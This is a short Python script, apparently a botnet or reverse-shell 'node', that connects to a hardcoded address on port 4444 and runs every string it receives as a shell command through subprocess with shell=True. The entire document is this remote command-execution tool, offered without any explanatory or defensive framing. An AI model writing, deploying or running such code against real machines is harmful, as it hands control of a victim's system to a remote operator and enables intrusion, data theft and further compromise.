#! /usr/bin/env python3

# nodes
import socket
import subprocess
from time import sleep

HOST = '192.168.0.4'
PORT = 4444

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((HOST, PORT))
    while True:
        try:
            sleep(2)
            data = s.recv(1024)
            print(data)
            if data:
                subprocess.call(data.decode(),shell=True)

        except Exception as error:
            print(error)
            break
